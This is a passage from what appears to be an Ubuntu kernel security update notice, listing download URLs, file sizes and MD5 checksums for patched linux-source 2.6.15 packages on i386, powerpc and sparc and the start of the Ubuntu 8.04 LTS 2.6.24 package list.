http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    33052 b3173bcb2f075ee1eb21d4a4cabccc95
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    85624 7b8b25edc1318186e444eb8fd5e81ad9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:     6024 252a0516364b72fc6941686bd28769a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:     8756 d94b79361dd2ed66d16ac819c1c94ac6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    53638 de31d0b1a2b3b3dd7bf0615aed25876b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   130964 7fcd54c609e5ffb089a95aad9f1f88ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    98466 0c43f5660cd5ac12cd714a9ed0e0b033
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    77212 f6089721f429c5e802844c61cbeccb91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:  1768820 24f785550385af62fb7fd494fb93718b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    69614 c353f4b826fe38081861b57aba7ac37c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    11768 154732744d766308a9a464ffa3fd3f59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    36104 d002dde7237ba687f850ff5a2b50d2fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   132672 d90c18be0a789b10180cb4f673f0fe57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    38580 a6edf5554b10f7205e1fb33209c35119
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   299158 28aeda82e3e1da5b8dd4ba0ef868e218

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    23734 ec1291df62b5863b32f3017851a81e28
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    26008 c01db7a3a547b1bdcf8a371a820b2c0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    49332 6eb8da45e82352422c66480f71604787
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    51536 625e679dd36a711bca39a4cbc90e8fbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:     2308 8685fcdae320537382f7d411c4a86664
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:     2480 dcd313dbd14b32a815c4df0b7b6452fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    40310 b01a7c8d355e6d30c251e7d3de99866f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    43846 ef5c07e2dde2ff1307dac768e5808d45
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   112608 1e3932e245833083a76f94526030e901
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   120738 9eb06ed68ec2a70a8f83d9aecc15f6f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    40908 0ef58a6a45875405f11bf83414571158
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    45998 5f882ba7e3771c3ccb3c7b67aaaa2a28
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    29026 90d608dc3367f896aaeb7e417e177108
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    29894 00455b6770b18f76126c02366c1ad08d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   211402 fb4b8b8d4c8a5d175124ba9de9eac663
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   225186 a5b5629cb05cc254bf5d34c17dcb3607
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    45058 e8a510c7c4d13a3a0dc6c021de355c14
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    40226 8c5c6321d98c1d22aa2afeb488d8604b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:     1938 812fc371865e06c40ffe21cd428f4e23
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:     2200 0ca4433c68a907bb1648d1c0cf92ea56
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    80766 67f2f7a3e60eb080cc252e27faf74ee4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    86136 6594a7883c1bcf959f6a76754c133e5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   111586 ebd34bcdd46c475eaad512286742a693
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   125754 0081e0be5986bb5c15587c3ed8352c86
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    53422 1ec2a52f88d867a44e6e2fe717bef1a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    58494 a776b62248889e90b9ce86dabd18c25e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   147964 b399103ca836328b5ec0d896c249b237
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   161906 4202603bd4c4beb2c5f63395e5ad8f22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   318416 0ddf80e3cf85f4732d7996b089f68a6c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   288016 3bc25cd75ffac001db2849cb08f1af5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   115866 14ff9f3cacbdc8095d4e09ec7a70bfef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   116546 c020d4c2020d6a0e052c1423d9f4180c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:  1924916 57ed953d69fc9bfa9c7fb8c59b384b9c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:  2449234 0db7e0aec50c892368ec422a8c1da333
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.83_powerpc.deb
  Size/MD5:   867180 f742f8e5979e5de5d2d8e37f854a806e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.83_powerpc.deb
  Size/MD5:   867214 872ddaf435c225d439c08d6113cdbfda
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.83_powerpc.deb
  Size/MD5:   865694 d229cedb5c93e081be89bc7e04fc0c8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_powerpc.deb
  Size/MD5:  6946534 92603435c82b4f894c21f7e175aec489
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.83_powerpc.deb
  Size/MD5: 22782590 8e13360c04faaf46966a278dfef57034
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.83_powerpc.deb
  Size/MD5: 23691818 50470b886e1f55d5955e90c757a5a4d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.83_powerpc.deb
  Size/MD5: 22363868 e763ada478e4533b682453a87f5a3770
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    17782 6be85802b9a87505e792fa579929bbdd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    17388 0548ae129d2ae569639acd2b938cfb85
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   261370 863df84b1f2d45613f592f35d1ebc2bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   282626 1a2e54c3086200d3cce35248af64c196
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   227822 9207a4c3a085c12e9d62075f7317c287
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   248954 bed95a76e97bbf651a5428f6a3e2fb80
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:  1048462 aee15879129edd8e22a467419ac37aac
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:  1048610 7447ee7c55acc599ef1526f62e669dd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:  1738560 18ecf7032164f14682205b016d15b8d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:  1878122 ba6efcbf22b000733999dcbf8590cd00
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   250838 b487dbfbcfef64ffd686e84e726f7b71
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   233534 66514cfa90f1dd6321d1f0129bd0be57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    13058 fccb534fe7a64a8b4def0f682df56fce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    13534 ada9543aa5c43f633f14ec7b13f6469e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    84796 4bb08b5db785cddd88eddb2e79c025dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    52202 830b5e30c9dd36d2c97a3a55a301278a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    73932 17c3114d93e0b583f6dff69216cebb49
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    85856 17b2bcb8ada779a950802685fc3fb64c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:     6622 6971cd578cce9f5eb3f1a04c603ff65c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:     7058 ce77da679a26e33626fa964f1975e76b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    60388 ecdda4f3d42ebdbc12817e98064e4999
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    70420 8fa61246180e8ff9e62f2a803759170f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   128550 6eec93cdc294f2d6ffba5a9223263802
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   157946 e76776fe480bfce17c1d01866f330374
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   108174 7243abdaa18ba8889a25e6a1d0b0ed3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   126130 863746f220320dfc89053b27a4314959
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    87300 bc9467d403b372cad5f96dc9f52afdfa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    93362 ca42dec74d7f34698bb93b215f7dc0d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:  2014776 e75ecd960831dfe1d50e44dc8aef61c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:  1988694 b35b5cf288687032dcf2340ef6022aaa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   104132 abd991111eec9c4b98c572247b3e7827
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   115806 8e032a1273787c5440f458b565d68d08
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    12744 e145eb648c1d659c783a2a9fd4238ac4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    14448 8c8b9229a9dd6d5593a49511d269c937
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    39954 00eb5f12014f4a170c07f74cdbd1092f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    41542 3a1576cf7f596cb63c1284e1371923ff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   149352 0f36cbc9a57808fe61f5d45513c2c379
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   168088 03cd1ec2802eff9dc9a4913d8c722a11
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    42314 aeac632e9b6a085751f5919290248f74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:    44920 c4f46e3b3fabfcc811a0b3cb2474fdd4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   320330 d57498dcb918956e5e02aff09d1ab5d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb
  Size/MD5:   324874 84c5cf72bb1f920da379ffffd4a75fbf

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:    50472 5c9065af16c456abdaddae51194acfdd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:     2358 e37e812551c0483ac3e0905b5e10f092
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:    40380 8e3af9c5794c3b2ebffe67126f47bf3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:   110552 3c8e232a43ce86acca5815ece9ba854c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:    41218 7bb313ecd2c6a07c1c089ab2ec93f7ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:   104222 1ab67ef824bc04cd507f3f88c4cd987a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:     7434 09b93698d62051a4baf92719bd21b14a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:   149314 ef116d9d09d29f93ae4a58f461410647
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:  1712882 3b4328554eb324571ab7682ee4e8a3a9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.83_sparc.deb
  Size/MD5:   771506 7caea4933e34a2b502c7668df1a6ab90
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.83_sparc.deb
  Size/MD5:   771132 c1a93f67aaecfc83300b9bd3a4976c68
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_sparc.deb
  Size/MD5:  6962430 a98225cb46e3fd78ff9a513e4e910bb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.83_sparc.deb
  Size/MD5: 15016514 f8d4f0805fa68d04c7ff6e90f99f2d1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.83_sparc.deb
  Size/MD5: 14832282 f1a4ceb954bfbed56b5074eea6ffc85a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:     7436 78f2a319a7d6c11563d9df2373fceab3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:   248766 4b3997d9492a7e901ab9e1ce32a11fbe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:   212564 b25a8203a7c2dc83c32f22044d7395bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:  1048442 fc26842536f9d7154244c491a98b9e87
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:  1482446 26dc79d91f304ac9e2b0a9b2a132f864
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:    10116 cd9625e8a2e645a36f7b75dd50a02413
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:    40180 b9c370ffcf5294455f959d9f5dfd7cce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:     9366 f16d374ff864ab6a32598a93664fecaa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:    61402 fa4b14306dbad45fe771b77d4449ef2c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:   163274 25232cd92ef5d9e81fdf488634f4b295
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:    64088 d8497fffa49122764a4fc3055e7916ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:  1235400 2d0d95dafaf1d7cb6aba59cfc8323e5a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:    59310 40bdbc31eb9bfcf8415fc687cd17cdbc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:    37426 9e6597125c50de3e79c60a7115e1823e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb
  Size/MD5:   280134 d69c0b6d976e188dc71fb2d08b8c5071

Updated packages for Ubuntu 8.04 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.68.diff.gz
  Size/MD5:  4805685 a1396c17a8f400420f78006b3490b006
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.68.dsc
  Size/MD5:     2258 bdd18494b15590678ab6757866384faf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz
  Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.68_all.deb
  Size/MD5:  4931804 4b94ee9aa9dd401f43c6c5dd0af5d312
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.68_all.deb
  Size/MD5:  8147526 36fbcde7f290ce7d36c5a86ec86d8fef
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.68_all.deb
  Size/MD5:   100082 825d07271f1e07aa87619758abfeaa93
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.68_all.deb
  Size/MD5: 46973018 43f133f61f904ba4d10c7df484dae5eb

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
